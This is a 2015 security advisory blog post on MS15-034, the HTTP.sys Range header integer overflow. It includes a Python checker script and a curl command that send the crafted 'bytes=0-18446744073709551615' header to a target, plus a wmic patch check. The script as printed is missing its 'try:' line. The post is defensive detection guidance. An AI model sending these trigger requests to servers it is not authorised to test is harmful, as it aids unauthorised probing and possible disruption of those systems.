April 16, 2015
MS15-034 – Range Header Integer Overflow
Written by
Geoff Walton and
David Kennedy
The Internet is all a buzz again with the latest Microsoft vulnerability, affecting HTTP.sys. We have been getting a number of questions about the severity and scope of impact.
To determine if you are applications or hosts are impacts consider the following items:- Does it use IIS 6.0 or Later?
- Does it use HTTP sever API?
- Does it use the WFC HttpListener and related classes?
- Open a command prompt as Administrator
- Execute: netstat –ab
- Locate the port your application uses in the listing, if the process name shows up as “Cannot obtain ownership information” and it acts as an HTTP server then it is very likely affected.
# Quick MS15-034 checker that supports HTTP/HTTPS
# Written by David Kennedy @ TrustedSec
# Blog: https://www.trustedsec.com/april-2015/ms15-034-range-header-integer-overflow/
import sys
import urllib2
url = "%s" % sys.argv[1]
print ''
print "MS15-034 Checker written by Dave Kennedy @ TrustedSec"
print "Original PoC used from here http://pastebin.com/ypURDPc4"
print "Supports HTTP/HTTPS"
print "Usage: python ms15-034.py <http(s)://url>"
print ''
request = urllib2.Request(url)
request.add_header('Range', 'bytes=0-18446744073709551615')
opener = urllib2.build_opener()
feeddata = opener.open(request).read()
print "[*] Does not appear to be vulnerable. Congrats! Or if you are a hacker, sorry, sux :P"
except Exception, e:
if "Requested Range Not Satisfiable" in str(e):
print "[*] Server appears to be vulnerable - got requested 'Request Range Not Satisfiable'."
print "[*] Does not appear to be vulnerable or got a different response. Printing response: " + str(e)
According to reports, an error response of "Requested Range Not Satisfiable" means the system likely vulnerable. A response of “The request has an invalid header name” means the system has been patched.
You can also use curl to test with the following curl command:
curl -v http(s)://hostname/ -H "Host: hostname" -H "Range: bytes=0-18446744073709551615" -k
Be aware that other systems may also have this vulnerability, but gave indeterminate results because of preceding errors (no authentication, file not found, etc.)
Local test on affected system:
Patches are available from Microsoft for Windows 2003, Vista, 2008, 7, 2008 R2, 8, 2012, 8.1, and 2012 R2. As detection of this vulnerability is prone to false positives, the following command should be issued on the host in question to test for the MS15-034 patch:wmic qfe | find "KB3042553"
If the results are blank, the patch has not been applied.
To understand the risk it is import to know what HTTP.sys does. Here is what Microsoft’s documentation has to say about it, HTTP.sys provides the following benefits:- Kernel-mode caching. Requests for cached responses are served without switching to user mode.
- Kernel-mode request queuing. Requests cause less overhead in context switching because the kernel forwards requests directly to the correct worker process. If no worker process is available to accept a request, the kernel-mode request queue holds the request until a worker process picks it up.
- Request pre-processing and security filtering.